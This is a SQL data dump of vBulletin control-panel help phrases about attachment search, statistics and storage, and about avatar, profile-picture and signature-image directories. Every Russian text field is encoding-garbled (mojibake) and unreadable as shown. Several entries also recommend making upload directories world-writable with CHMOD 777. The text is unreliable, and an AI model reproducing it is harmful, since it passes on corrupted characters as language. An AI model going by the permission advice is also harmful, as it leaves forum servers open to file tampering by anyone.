(21943, -1, 'attachment_search_text', 'cphelptext', 'Ãà ýòîé ñòðà Ãèöå âà ì ïðåäîñòà âëÿåòñÿ èÃôîðìà öèÿ î êà æäîì âëîæåÃèè, êîòîðîå áûëî Ãà éäåÃî â ðåçóëüòà òå âà øåãî ïîèñêà . (Ñì. Ãîèñê îïðåäåëåÃÃûõ âëîæåÃèé ) \r\n\r\nÇäåñü âû óâèäèòå ñëåäóþùåå: \r\nÈìÿ ôà éëà : ýòî èìÿ ôà éëà âëîæåÃèÿ. Ãà æà â Ãà èìÿ ôà éëà , âû ñìîæåòå ïîñìîòðåòü âëîæåÃèå, åñëè ýòî èçîáðà æåÃèå, èëè ïîëó÷èòü çà ïðîñ Ãà çà ãðóçêó îÃîãî, åñëè âëîæåÃèå äðóãîãî òèïà . \r\n\r\nÈìÿ ïîëüçîâà òåëÿ : ýòî ïîëüçîâà òåëü, êîòîðûé ñäåëà ë âëîæåÃèå. Ãà æà â Ãà èìÿ, âû ñìîæåòå îòðåäà êòèðîâà òü åãî ïðîôèëü. \r\n\r\nÄà òà : ýòî äà òà , êîãäà áûëî ñäåëà Ãî âëîæåÃèå. Ãðÿìî çà Ãåé Ãà õîäèòñÿ ññûëêà äëÿ ïðîñìîòðà ñîîáùåÃèå, â êîòîðîå áûëî ñäåëà Ãî âëîæåÃèå. \r\n\r\nÃà çìåð : ýòî ðà çìåð âëîæåÃèÿ â Êá (êèëîáà éòà õ). \r\n\r\nÑêà ÷èâà Ãèÿ : ýòî ÷èñëî ïîêà çûâà åò ñêîëüêî ðà ç áûëî ñêà ÷à Ãî âëîæåÃèå. \r\n\r\nÑ ïðà âîé ñòîðîÃû Ãà õîäèòñÿ êîëîÃêà ïåðåêëþ÷à òåëåé. Âû ìîæåòå âûáèðà òü èõ ñà ìîñòîÿòåëüÃî, èëè Ãà æà â Ãà êÃîïêó â çà ãîëîâêå, ÷òîáû âûáðà òü èõ âñå. Ãà æà â Ãà \"Óäà ëèòü âûáðà ÃÃûå âëîæåÃèÿ\", âû óäà ëèòå îòìå÷åÃÃûå âëîæåÃèÿ. \r\n\r\nÑ ëåâîé ñòîðîÃû Ãà õîäèòñÿ ññûëêà Ãà óäà ëåÃèå âëîæåÃèé.', 'vbulletin', 'zCarot', 1205430963, '3.7.0 Release Candidate 1'),
(21944, -1, 'attachment_search_title', 'cphelptext', 'Ãåçóëüòà òû ïîèñêà âëîæåÃèé', 'vbulletin', '', 0, ''),
(21945, -1, 'attachment_stats_text', 'cphelptext', 'Ãà ýòîé ñòðà Ãèöå âû ìîæåòå óçÃà òü Ãåêîòîðûå âà æÃûå ïÿòåðêè ôà éëîâ è ïîëüçîâà òåëåé, à òà êæå îáùóþ ñòà òèñòèêó. \r\n\r\nÑâåðõó âÃèç:\r\nÑòà òèñòèêà : \r\nÂñåãî âëîæåÃèé : ýòî îáùåå êîëè÷åñòâî âëîæåÃèé Ãà âà øåì ôîðóìå. \r\n\r\nÇà Ãèìà åìîå ìåñòî : ýòî ðà çìåð îáùåãî çà Ãèìà åìîãî ìåñòà Ãà äèñêå âñåìè âëîæåÃèÿìè. \r\n\r\nÒèï õðà ÃÃ¥Ãèÿ : îïðåäåëÿåò, ãäå õðà Ãÿòñÿ âëîæåÃèÿ: â áà çå äà ÃÃûõ èëè ïðÿìî â ôà éëîâîé ñèñòåìå, è åñëè èñïîëüçóåòñÿ ôà éëîâà ÿ ñèñòåìà , òî óêà çûâà åòñÿ ïóòü ê ôà éëà ì. \r\n\r\nÑðåäÃèé ðà çìåð âëîæåÃèÿ : ýòî ñðåäÃèé ðà çìåð ôà éëà -âëîæåÃèÿ, îïðåäåëÿåòñÿ ïóò¸ì äåëåÃèÿ îáùåãî çà Ãèìà åìîãî ìåñòà âëîæåÃèÿìè Ãà èõ êîëè÷åñòâî. \r\n\r\nÃîä ïÿòüþ Ãà èáîëåå ïîïóëÿðÃûìè âëîæåÃèÿìè Ãà õîäÿòñÿ ñëåäóþùèå êîëîÃêè: \r\nÇâà Ãèå ïîëüçîâà òåëåé : ìåñòî âëîæåÃèÿ â ðåéòèÃãå. \r\n\r\nÈìÿ ôà éëà : èìÿ ôà éëà âëîæåÃèÿ. Ãà æà â Ãà èìÿ ôà éëà , âû ñìîæåòå ïîñìîòðåòü âëîæåÃèå, åñëè ýòî èçîáðà æåÃèå, èëè ïîëó÷èòü çà ïðîñ Ãà çà ãðóçêó îÃîãî, åñëè âëîæåÃèå äðóãîãî òèïà . \r\n\r\nÈìÿ ïîëüçîâà òåëÿ : ýòî ïîëüçîâà òåëü, êîòîðûé çà ãðóçèë âëîæåÃèå. Ãà æà â Ãà èìÿ, âû ñìîæåòå îòðåäà êòèðîâà òü åãî ïðîôèëü. \r\n\r\nÑêà ÷èâà Ãèÿ : ýòî ÷èñëî ïîêà çûâà åò ñêîëüêî ðà ç áûëî ñêà ÷à Ãî âëîæåÃèå. \r\n\r\nÑëåâà Ãà õîäèòñÿ Ãåñêîëüêî äðóãèõ îïöèé. \r\nÃîñìîòðåòü ñîîáùåÃèå : ïîêà æåò âà ì ñîîáùåÃèå, ê êîòîðîìó áûëî ïðèêðåïëåÃî âëîæåÃèå. \r\n\r\nÓäà ëèòü : âûáåðèòå ýòîò ïóÃêò, åñëè ñîáèðà åòåñü óäà ëèòü âëîæåÃèå. \r\n\r\nÃÿòü Ãà èáîëüøèõ âëîæåÃèé : ñîâåðøåÃÃî èäåÃòè÷Ãî, êðîìå òîãî, ÷òî êîëîÃêà Ñêà ÷èâà Ãèÿ çà ìåÃÃ¥Ãà êîëîÃêîé Ãà çìåð. Ãòà êîëîÃêà îòîáðà æà åò ðà çìåð âëîæåÃèÿ â Êá (êèëîáà éòà õ). \r\n\r\nÃÿòü ïîëüçîâà òåëåé, ÷üè âëîæåÃèÿ çà Ãèìà þò áîëüøå âñåãî ìåñòà : îòîáðà çèò âà ì òåõ, êòî çà ãðóçèë âëîæåÃèé Ãà Ãà èáîëüøèé ðà çìåð ôà éëîâ. Äëÿ êà æäîãî ïîëüçîâà òåëÿ â ïÿò¸ðêå (åñëè ïîëüçîâà òåëåé, êîòîðûå çà ãðóæà ëè âëîæåÃèÿ, ìåÃüøå ïÿòè, òî áóäóò îòîáðà æà òüñÿ ëèøü îÃè) óêà çûâà åòñÿ åãî èìÿ, ÷èñëî âëîæåÃèé è èõ îáùèé ðà çìåð. Ãà æà â Ãà \"Ãðîñìîòð âëîæåÃèé\" â êîÃöå êà æäîé êîëîÃêè âû Ãà éä¸òå âñå âëîæåÃèÿ, êîòîðûå çà ãðóçèë ïîëüçîâà òåëü. (Ñì. Ãîèñê âëîæåÃèé )', 'vbulletin', 'zCarot', 1205430963, '3.7.0 Release Candidate 1'),
(21946, -1, 'attachment_stats_title', 'cphelptext', 'Ãðîñìîòð ñòà òèñòèêè âëîæåÃèé', 'vbulletin', '', 0, ''),
(21947, -1, 'attachment_storage_switchtype_text', 'cphelptext', 'Ãòîò ïðîöåññ ïîçâîëèò âà ì ïåðåìåñòèòü âà øè âëîæåÃèÿ èç áà çû äà ÃÃûõ â ôà éëîâóþ ñèñòåìó, èëè, åñëè îÃè óæå â ôà éëîâîé ñèñòåìå, â äðóãóþ äèðåêòîðèþ ôà éëîâîé ñèñòåìû, ëèáî Ãà çà ä â áà çó äà ÃÃûõ. Ãîæà ëóéñòà , ïîìÃèòå, ÷òî åñëè âû ïðåäïîëà ãà åòå, ÷òî ó âà ñ Ãåäîñòà òî÷Ãî ìåñòà Ãà äèñêå, òî ïðîöåññ áóäåò îñòà ÃîâëåÃ, Ãî âà øè âëîæåÃèÿ áóäóò â áåçîïà ñÃîñòè, òà ê êà ê ñÃà ÷à ëà ïðîèñõîäèò ïðîâåðêà Ãà Ãà ëè÷èå ñâîáîäÃîãî ìåñòà . \r\nÂëîæåÃèÿ ÃÃ¥ áóäóò óäà ëåÃû èç áà çû äà ÃÃûõ èëè èç ôà éëîâîé ñèñòåìû, è âà øà Ãà ñòðîéêà òèïà õðà ÃÃ¥Ãèÿ ÃÃ¥ èçìåÃèòñÿ äî çà âåðøåÃèÿ ïðîöåññà . \r\nÅñëè ïðîöåññ ïðåðâåòñÿ äî îêîÃֈ Ãèÿ, òî âà ì ÃóæÃî áóäåò îñâîáîäèòü ìåñòî èëè óäà ëèòü Ãåñêîëüêî âëîæåÃèé äî ïîâòîðÃîé ïîïûòêè. \r\n\r\nÅñëè âû ïåðåìåùà åòå âëîæåÃèÿ â ôà éëîâóþ ñèñòåìó, òî ðåêîìåÃäóåòñÿ èñïîëüçîâà òü ïà ïêó Ãà ä âà øèì web root (îáû÷Ãî Ãà çûâà åòñÿ public_html èëè www èëè www_root), ïîòîìó ÷òî ëþäè ñìîãó ñà ìîñòîÿòåëüÃî ñêà ÷èâà òü âëîæåÃèÿ, ìèÃóÿ ñèñòåìó áåçîïà ñÃîñòè ôîðóìà . Òà êæå âû äîëæÃû áóäåòå óñòà Ãîâèòü ïðà âà çà ïèñè Ãà äèðåêòîðèþ. Ãà èïðîñòåéøèé ïóòü - óñòà Ãîâèòü CHMOD 777 (èçó÷èòå äîêóìåÃòà öèþ ïî âà øåìó FTP, Telnet èëè SSH, ÷òîáû óçÃà òü êà ê ýòî ñäåëà òü). Ìû ÃÃ¥ ðåêîìåÃäóåì ñîõðà Ãÿòü âà øó ïà ïêó ñ CHMOD 777 ïîä âà øèì web root - ýòî äðóãà ÿ õîðîøà ÿ ïðè÷èÃà èìåòü ïà ïêó Ãà ä root`îì. \r\n\r\nÅñëè âû ïåðåìåùà åòå âëîæåÃèÿ èç ôà éëîâîé ñèñòåìû â áà çó äà ÃÃûõ, òî âû äîëæÃû èìåòü äîñòà òî÷Ãî ìåñòà Ãà òîì äèñêå, ãäå õðà Ãèòñÿ âà øà áà çà äà ÃÃûõ.', 'vbulletin', '', 0, ''),
(21948, -1, 'attachment_storage_switchtype_title', 'cphelptext', 'ÃåðåÃîñ âëîæåÃèé èç áà çû äà ÃÃûõ â ôà éëîâóþ ñèñòåìó è Ãà îáîðîò', 'vbulletin', '', 0, ''),
(21949, -1, 'attachment_switchtype_attachpath_text', 'cphelptext', 'Ãòî ïóòü ê õðà Ãèìûì âëîæåÃèÿì.\r\n\r\nÃòîò ïóòü äîëæåà áûòü äîñòóïåà äëÿ ÷òåÃèÿ È çà ïèñè âà øèì ñåðâåðîì (îáû÷Ãî CHMOD 777). Îà äîëæåà áûòü âûøå âà øåãî root`à , èÃà ÷å ïîëüçîâà òåëè ñìîãóò ñêà ÷èâà òü âëîæåÃèÿ ìèÃóÿ ñèñòåìó áåçîïà ñÃîñòè ôîðóìà .', 'vbulletin', '', 0, ''),
(21950, -1, 'attachment_switchtype_attachpath_title', 'cphelptext', 'Ãóòü ê ôà éëà ì âëîæåÃèé', 'vbulletin', '', 0, ''),
(21951, -1, 'attachment_types_text', 'cphelptext', 'Ãà ýòîé ñòðà Ãèöå âû ìîæåòå óâèäåòü âñå òèïû âëîæåÃèé, êîòîðûå ìîãóò áûòü çà ãðóæåÃû ïðè òåêóùèõ Ãà ñòðîéêà õ. Îòñþäà âû ìîæåòå ðåäà êòèðîâà òü èëè óäà ëèòü ëþáîé òèï, ñ ïîìîùüþ Ãà æà òèÿ Ãà ñîîòâåòñòâóþùóþ ññûëêó, à Ãà æà â Ãà \"Äîáà âèòü Ãîâûé òèï\", âû ñìîæåòå äîáà âèòü Ãîâûé òèï âëîæåÃèÿ.', 'vbulletin', '', 0, ''),
(21952, -1, 'attachment_types_title', 'cphelptext', 'ÈçìåÃÃ¥Ãèå òèïîâ âëîæåÃèé', 'vbulletin', '', 0, ''),
(21953, -1, 'attachment_updatetype_text', 'cphelptext', 'Ãà ýòîé ñòðà Ãèöå âû ìîæåòå óñòà Ãîâèòü ðÿä ïà ðà ìåòðîâ îòÃîñèòåëüÃî òèïà ôà éëà , êîòîðûé âû ðåäà êòèðóéòå.', 'vbulletin', '', 0, ''),
(21954, -1, 'attachment_updatetype_title', 'cphelptext', 'ÈçìåÃÃ¥Ãèå òèïà âëîæåÃèÿ', 'vbulletin', '', 0, ''),
(21955, -1, 'attachment_updatetype_extension_text', 'cphelptext', 'Ãòî ðà ñøèðåÃèå ôà éëà - áóêâû ïîñëå òî÷êè â èìåÃè ôà éëà . Ãà ïðèìåð, èìÿ ôà éëà read.me èìååò ðà ñøèðåÃèå me .', 'vbulletin', '', 0, ''),
(21956, -1, 'attachment_updatetype_extension_title', 'cphelptext', 'Ãà ñøèðåÃèå', 'vbulletin', '', 0, ''),
(21957, -1, 'attachment_updatetype_size_text', 'cphelptext', 'Âû ìîæåòå óñòà Ãîâèòü ìà êñèìà ëüÃûé ðà çìåð çà ãðóæà åìîãî ôà éëà äëÿ êà æäîãî òèïà . ×èñëî óêà çûâà åòñÿ â áà éòà õ.', 'vbulletin', '', 0, ''),
(21958, -1, 'attachment_updatetype_size_title', 'cphelptext', 'Ìà êñèìà ëüÃûé ðà çìåð ôà éëà ', 'vbulletin', '', 0, ''),
(21959, -1, 'attachment_updatetype_height_text', 'cphelptext', 'Åñëè òèï - èçîáðà æåÃèå, òî ýòîò ïà ðà ìåòð îïðåäåëÿåò ìà êñèìà ëüÃóþ âûñîòó, êîòîðóþ ìîæåò èìåòü âëîæåÃèå. Åñëè âûñîòà áîëüøå ýòîé âåëè÷èÃû, òî âëîæåÃèå èãÃîðèðóåòñÿ.', 'vbulletin', '', 0, ''),
(21960, -1, 'attachment_updatetype_height_title', 'cphelptext', 'Ìà êñèìà ëüÃà ÿ âûñîòà ', 'vbulletin', '', 0, ''),
(21961, -1, 'attachment_updatetype_width_text', 'cphelptext', 'Åñëè òèï - èçîáðà æåÃèå, òî ýòîò ïà ðà ìåòð îïðåäåëÿåò ìà êñèìà ëüÃóþ øèðèÃó, êîòîðóþ ìîæåò èìåòü âëîæåÃèå. Åñëè øèðèÃà áîëüøå ýòîé âåëè÷èÃû, òî âëîæåÃèå èãÃîðèðóåòñÿ.', 'vbulletin', '', 0, ''),
(21962, -1, 'attachment_updatetype_width_title', 'cphelptext', 'Ìà êñèìà ëüÃà ÿ øèðèÃà ', 'vbulletin', '', 0, ''),
(21963, -1, 'attachment_updatetype_mimetype_text', 'cphelptext', 'Äëÿ òîãî, ÷òîáû îáîçðåâà òåëü ïðà âèëüÃî ðà ñïîçÃà âà ë òèï ôà éëà , çà ãîëîâîê content-type äîëæåà áûòü îòîñëà à äî ôà éëà . Ôîðóì îòïðà âèò çà ãîëîâîê âà ì à âòîìà òè÷åñêè, Ãî âû äîëæÃû ïðåäóñìîòðåòü ïîïðà âêó òèïîâ Mime òà ê, ÷òîáû çà ãîëîâîê îòïðà âëÿëñÿ ïðà âèëüÃî. \r\n\r\nÃðà âèëüÃûé ôîðìà ò ýòîãî ïîëÿ: \r\nContent-type: type/subtype \r\nÃà ïðèìåð, äëÿ èçîáðà æåÃèé JPEG: \r\nContent-type: image/jpeg \r\n\r\nÂû ìîæåòå Ãà éòè ñïèñîê òèïîâ è ïîäòèïîâ çäåñü .', 'vbulletin', '', 0, ''),
(21964, -1, 'attachment_updatetype_mimetype_title', 'cphelptext', 'Òèï MIME è çà ãîëîâêè', 'vbulletin', 'zCarot', 1210082606, '3.7.1'),
(21965, -1, 'attachment_updatetype_enabled_text', 'cphelptext', 'Åñëè ýòà îïöèÿ óñòà ÃîâëåÃà Ãà \"Äà \", òî ïîëüçîâà òåëè ñìîãóò çà ãðóæà òü ôà éëû ýòîãî òèïà .  ïðîòèâÃîì ñëó÷à å ýòîãî Ãåëüçÿ áóäåò ñäåëà òü, Ãî ýòîò òèï âñ¸ ðà âÃî áóäåò â ïà Ãåëè à äìèÃèñòðà òîðà .', 'vbulletin', '', 0, ''),
(21966, -1, 'attachment_updatetype_enabled_title', 'cphelptext', 'Âêëþ÷åÃî', 'vbulletin', '', 0, ''),
(21967, -1, 'attachment_updatetype_newwindow_text', 'cphelptext', 'Ãòîò ïà ðà ìåòð îïðåäåëÿåò, êà ê âëîæåÃèå áóäåò îòîáðà æà òüñÿ ïîëüçîâà òåëþ. Ñëåäóåò îòêðûâà òü âëîæåÃÃûå èçîáðà æåÃèÿ â Ãîâîì îêÃÃ¥/çà êëà äêå îáîçðåâà òåëÿ, à âëîæåÃÃûå ôà éëû â ýòîì æå îêÃÃ¥, ÷òîáû ïðèëîæåÃèå, à ññîöèèðîâà ÃÃîå ñ ýòèì òèïîì ôà éëà , îòêðûâà ëî åãî Ãà ïðÿìóþ. Îòêðûòèå Ãîâîãî îêÃà äëÿ òà êèõ òèïîâ ôà éëîâ áóäåò îçÃà ÷à òü îòêðûòèå ïóñòîãî îêÃà â Ãåêîòîðûõ îáîçðåâà òåëÿõ.', 'vbulletin', '', 0, ''),
(21968, -1, 'attachment_updatetype_newwindow_title', 'cphelptext', 'Îòêðûòü âëîæåÃèå â Ãîâîì îêÃÃ¥', 'vbulletin', '', 0, ''),
(21969, -1, 'attachmentpermission_edit_height_text', 'cphelptext', 'Åñëè òèï - èçîáðà æåÃèå, òî ýòîò ïà ðà ìåòð îïðåäåëÿåò ìà êñèìà ëüÃóþ âûñîòó, êîòîðóþ ìîæåò èìåòü âëîæåÃèå. Åñëè âûñîòà áîëüøå ýòîé âåëè÷èÃû, òî âëîæåÃèå èãÃîðèðóåòñÿ.', 'vbulletin', 'zCarot', 1148489948, '3.6.0 Beta 1'),
(21970, -1, 'attachmentpermission_edit_height_title', 'cphelptext', 'Ìà êñèìà ëüÃà ÿ âûñîòà ', 'vbulletin', 'zCarot', 1148489948, '3.6.0 Beta 1'),
(21971, -1, 'attachmentpermission_edit_size_text', 'cphelptext', 'Âû ìîæåòå óñòà Ãîâèòü ìà êñèìà ëüÃûé ðà çìåð çà ãðóæà åìîãî ôà éëà äëÿ êà æäîãî òèïà . ×èñëî óêà çûâà åòñÿ â áà éòà õ.', 'vbulletin', 'zCarot', 1148489915, '3.6.0 Beta 1'),
(21972, -1, 'attachmentpermission_edit_size_title', 'cphelptext', 'Ìà êñèìà ëüÃûé ðà çìåð ôà éëà ', 'vbulletin', 'zCarot', 1148489915, '3.6.0 Beta 1'),
(21973, -1, 'attachmentpermission_edit_useextension_text', 'cphelptext', 'Åñëè Ãåò, òî óêà çà ÃÃà ÿ ãðóïïà ïîëüçîâà òåëåé ÃÃ¥ ñìîæåò çà ãðóæà òü òà êèå òèïû âëîæåÃèé. Óáåäèòåñü, ÷òî âûáðà Ãî \"Èñïîëüçîâà òü äðóãèå ðà çðåøåÃèÿ\", èÃà ÷å èçìåÃÃ¥Ãèÿ ÃÃ¥ áóäóò çà ïèñà Ãû.', 'vbulletin', 'zCarot', 1191233783, '3.7.0 Beta 1'),
(21974, -1, 'attachmentpermission_edit_useextension_title', 'cphelptext', 'ÌîæÃî èñïîëüçîâà òü ýòî ðà ñøèðåÃèå', 'vbulletin', 'zCarot', 1148490007, '3.6.0 Beta 1'),
(21975, -1, 'attachmentpermission_edit_width_text', 'cphelptext', 'Åñëè òèï - èçîáðà æåÃèå, òî ýòîò ïà ðà ìåòð îïðåäåëÿåò ìà êñèìà ëüÃóþ øèðèÃó, êîòîðóþ ìîæåò èìåòü âëîæåÃèå. Åñëè øèðèÃà áîëüøå ýòîé âåëè÷èÃû, òî âëîæåÃèå èãÃîðèðóåòñÿ.', 'vbulletin', 'zCarot', 1148489932, '3.6.0 Beta 1'),
(21976, -1, 'attachmentpermission_edit_width_title', 'cphelptext', 'Ìà êñèìà ëüÃà ÿ øèðèÃà ', 'vbulletin', 'zCarot', 1148489932, '3.6.0 Beta 1'),
(21977, -1, 'avatar_text', 'cphelptext', 'Ñïðà âî÷Ãûå ñòà òüè: \r\nÀâà òà ðû, èêîÃêè ñîîáùåÃèé è ñìà éëû \r\nÕðà ÃÃ¥Ãèå èçîáðà æåÃèé ïîëüçîâà òåëÿ \r\n\r\nÕðà ÃÃ¥Ãèå èçîáðà æåÃèé ïîëüçîâà òåëÿ: \r\nÔîðóì ïîääåðæèâà åò äâà âèäà õðà ÃÃ¥Ãèÿ à âà òà ðîâ è ôîòîãðà ôèé: áà çó äà ÃÃûõ è ôà éëîâóþ ñèñòåìó. \r\n\r\nÎáà ìåòîäà èìåþò ïðåèìóùåñòâà è Ãåäîñòà òêè. Ãà çà äà ÃÃûõ ïîçâîëÿåò áûñòðî äåëà òü ðåçåðâÃóþ êîïèþ èÃäèâèäóà ëüÃûõ ôà éëîâ. ÎäÃà êî õðà ÃÃ¥Ãèå èçîáðà æåÃèé ïîëüçîâà òåëÿ â áà çå äà ÃÃûõ äîïîëÃèòåëüÃî ïåðåãðóæà åò å¸, êîãäà ïîëüçîâà òåëè çà ãðóæà þò èçîáðà æåÃèÿ ñî ñòðà Ãèö ôîðóìà . Ãî ñ ïîìîùüþ áà çû äà ÃÃûõ âû ñìîæåòå îãðà Ãè÷èòü äîñòóï ê à âà òà ðà ì, áåç èñïîëüçîâà Ãèÿ ñèñòåìû áåçîïà ñÃîñòè ôîðóìà è ïðà â äèðåêòîðèé êà ê htaccess.', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'),
(21978, -1, 'avatar_title', 'cphelptext', 'ÃŽ õðà ÃÃ¥Ãèè èçîáðà æåÃèé ïîëüçîâà òåëÿ', 'vbulletin', '', 0, ''),
(21979, -1, 'avatar_storage_switchtype_text', 'cphelptext', 'Ãòîò ïðîöåññ ïîçâîëèò âà ì ïåðåìåñòèòü âà øè à âà òà ðû è ôîòîãðà ôèè èç áà çû äà ÃÃûõ â ôà éëîâóþ ñèñòåìó, èëè, åñëè îÃè óæå â ôà éëîâîé ñèñòåìå, â äðóãóþ äèðåêòîðèþ ôà éëîâîé ñèñòåìû, ëèáî Ãà çà ä â áà çó äà ÃÃûõ. Ãîæà ëóéñòà , ïîìÃèòå, ÷òî åñëè âû ïðåäïîëà ãà åòå, ÷òî ó âà ñ Ãåäîñòà òî÷Ãî ìåñòà Ãà äèñêå, òî ïðîöåññ áóäåò îñòà ÃîâëåÃ, Ãî âà øè èçîáðà æåÃèÿ áóäóò â áåçîïà ñÃîñòè, òà ê êà ê ñÃà ÷à ëà ïðîèñõîäèò ïðîâåðêà Ãà Ãà ëè÷èå ñâîáîäÃîãî ìåñòà . Èçîáðà æåÃèÿ ÃÃ¥ áóäóò óäà ëåÃû èç áà çû äà ÃÃûõ èëè èç ôà éëîâîé ñèñòåìû è âà øà Ãà ñòðîéêà òèïà õðà ÃÃ¥Ãèÿ ÃÃ¥ èçìåÃèòñÿ äî çà âåðøåÃèÿ ïðîöåññà . \r\n\r\nÅñëè âû ïåðåìåùà åòå èçîáðà æåÃèÿ â ôà éëîâóþ ñèñòåìó, òî âà ì ÃóæÃî áóäåò ñîçäà òü äèðåêòîðèþ â âà øåé ïà ïêå ñ ôîðóìîì (Ãà ïðèìåð, /images/customavatars) äëÿ èõ õðà ÃÃ¥Ãèÿ.  ïðîòèâîïîëîæÃîñòü õðà ÃÃ¥Ãèþ âëîæåÃèé â ôà éëîâîé ñèñòåìå, ýòà ïà ïêà äîëæÃà áûòü äîñòóïÃà èç ñåòè (îáû÷Ãî CHMOD 777). \r\n\r\nÅñëè âû ïåðåìåùà åòå èçîáðà æåÃèÿ èç ôà éëîâîé ñèñòåìû â áà çó äà ÃÃûõ, òî âû äîëæÃû èìåòü äîñòà òî÷Ãî ñâîáîäÃîãî ìåñòà Ãà òîì äèñêå, ãäå õðà Ãèòñÿ âà øà áà çà äà ÃÃûõ.', 'vbulletin', '', 0, ''),
(21980, -1, 'avatar_storage_switchtype_title', 'cphelptext', 'ÃåðåÃîñ èçîáðà æåÃèé èç áà çû äà ÃÃûõ â ôà éëîâóþ ñèñòåìó è Ãà îáîðîò', 'vbulletin', '', 0, ''),
(21981, -1, 'avatar_switchtype_avatarpath_text', 'cphelptext', 'Çäåñü óêà çûâà åòñÿ ïóòü ê äèðåêòîðèè Ãà âà øåì ñåðâåðå, ãäå áóäóò õðà Ãèòüñÿ à âà òà ðû. Îà äîëæåà áûòü îòÃîñèòåëüÃûì îò êîðÃåâîé ïà ïêè ôîðóìà è äîëæåà èìåòü CHMOD òà êîé, ÷òîáû âà ø ñåðâåð ìîã ÷èòà òü è ïèñà òü â Ãå¸ (îáû÷Ãî 777). Òà êæå îà äîëæåà áûòü äîñòóïÃûì èç ñåòè! (Ãòî îòëè÷à åòñÿ îò ïóòè ê âëîæåÃèÿì â ôà éëîâîé ñèñòåìå, ãäå ðåêîìåÃäóåòñÿ èñïîëüçîâà òü ïà ïêó, ÃåäîñòóïÃóþ èç ñåòè.) \r\nÃà ðà ìåòð \r\n./customavatars \r\náóäåò îçÃà ÷à òü, ÷òî äèðåêòîðèÿ customavatars Ãà õîäèòñÿ â êîðÃåâîé ïà ïêå ôîðóìà .', 'vbulletin', '', 0, ''),
(21982, -1, 'avatar_switchtype_avatarpath_title', 'cphelptext', 'Äèðåêòîðèÿ à âà òà ðîâ', 'vbulletin', '', 0, ''),
(21983, -1, 'avatar_switchtype_avatarurl_text', 'cphelptext', 'Ãòî URL ê ïà ïêå ñ à âà òà ðà ìè îòÃîñèòåëüÃî âà øåé êîðÃåâîé ïà ïêè ôîðóìà . Åñëè âû èñïîëüçóéòå ïà ðà ìåòð./customavatars \r\nâ îïöèè \"Ãóòü ê à âà òà ðà ì\", òî âû äîëæÃû Ãà ïèñà òü çäåñü \r\ncustomavatars', 'vbulletin', '', 0, ''),
(21984, -1, 'avatar_switchtype_avatarurl_title', 'cphelptext', 'URL ê à âà òà ðà ì', 'vbulletin', '', 0, ''),
(21985, -1, 'avatar_switchtype_profilepicpath_text', 'cphelptext', 'Çäåñü óêà çûâà åòñÿ ïóòü ê äèðåêòîðèè Ãà âà øåì ñåðâåðå, ãäå áóäóò õðà Ãèòüñÿ ôîòîãðà ôèè. Îà äîëæåà áûòü îòÃîñèòåëüÃûì îò êîðÃåâîé ïà ïêè ôîðóìà è äîëæåà èìåòü CHMOD òà êîé, ÷òîáû âà ø ñåðâåð ìîã ÷èòà òü è ïèñà òü â Ãå¸ (îáû÷Ãî 777). Òà êæå îà äîëæåà áûòü äîñòóïÃûì èç ñåòè! (Ãòî îòëè÷à åòñÿ îò ïóòè ê âëîæåÃèÿì â ôà éëîâîé ñèñòåìå, ãäå ðåêîìåÃäóåòñÿ èñïîëüçîâà òü ïà ïêó, ÃåäîñòóïÃóþ èç ñåòè.) Ãà ðà ìåòð ./customprofilepics áóäåò îçÃà ÷à òü, ÷òî äèðåêòîðèÿ customprofilepics Ãà õîäèòñÿ â êîðÃåâîé ïà ïêå ôîðóìà .', 'vbulletin', '', 0, ''),
(21986, -1, 'avatar_switchtype_profilepicpath_title', 'cphelptext', 'Ãóòü ê ôîòîãðà ôèÿì', 'vbulletin', '', 0, ''),
(21987, -1, 'avatar_switchtype_profilepicurl_text', 'cphelptext', 'Ãòî URL ê ïà ïêå ñ ôîòîãðà ôèÿìè îòÃîñèòåëüÃî âà øåé êîðÃåâîé ïà ïêè ôîðóìà . Åñëè âû èñïîëüçóéòå ïà ðà ìåòð./customprofilepics â îïöèè \"Ãóòü ê ôîòîãðà ôèÿì\", òî âû äîëæÃû óñòà Ãîâèòü ýòó îïöèþ Ãà customprofilepics', 'vbulletin', '', 0, ''),
(21988, -1, 'avatar_switchtype_profilepicurl_title', 'cphelptext', 'URL ê ôîòîãðà ôèÿì', 'vbulletin', '', 0, ''),
(21989, -1, 'avatar_switchtype_sigpicpath_text', 'cphelptext', 'Çäåñü óêà çûâà åòñÿ ïóòü ê äèðåêòîðèè Ãà âà øåì ñåðâåðå, ãäå áóäóò õðà Ãèòüñÿ èçîáðà æåÃèÿ ïîäïèñè. Îà äîëæåà áûòü îòÃîñèòåëüÃûì îò êîðÃåâîé ïà ïêè ôîðóìà è äîëæåà èìåòü CHMOD òà êîé, ÷òîáû âà ø ñåðâåð ìîã ÷èòà òü è ïèñà òü â Ãå¸ (îáû÷Ãî 777). Òà êæå îà äîëæåà áûòü äîñòóïÃûì èç ñåòè! (Ãòî îòëè÷à åòñÿ îò ïóòè ê âëîæåÃèÿì â ôà éëîâîé ñèñòåìå, ãäå ðåêîìåÃäóåòñÿ èñïîëüçîâà òü ïà ïêó, ÃåäîñòóïÃóþ èç ñåòè.) Ãà ðà ìåòð ./signaturepics áóäåò îçÃà ÷à òü, ÷òî äèðåêòîðèÿ signaturepics Ãà õîäèòñÿ â êîðÃåâîé ïà ïêå ôîðóìà .', 'vbulletin', 'zCarot', 1225807294, '3.8.0 Beta 2'),
(21990, -1, 'avatar_switchtype_sigpicpath_title', 'cphelptext', 'Äèðåêòîðèÿ ôà éëîâ èçîáðà æåÃèé ïîäïèñè', 'vbulletin', 'zCarot', 1220959622, '3.8.0 Alpha 1'),
(21991, -1, 'avatar_switchtype_sigpicurl_text', 'cphelptext', 'Ãòî URL ê ïà ïêå ñ èçîáðà æåÃèÿìè ïîäïèñè îòÃîñèòåëüÃî âà øåé êîðÃåâîé ïà ïêè ôîðóìà . Åñëè âû èñïîëüçóéòå ïà ðà ìåòð./signaturepics â îïöèè \"Äèðåêòîðèÿ ôà éëîâ èçîáðà æåÃèé ïîäïèñè\", òî âû äîëæÃû óñòà Ãîâèòü ýòó îïöèþ Ãà signaturepics', 'vbulletin', 'zCarot', 1225807347, '3.8.0 Beta 2'),
(21992, -1, 'avatar_switchtype_sigpicurl_title', 'cphelptext', 'URL èçîáðà æåÃèé ïîäïèñè', 'vbulletin', 'zCarot', 1220959674, '3.8.0 Alpha 1'),
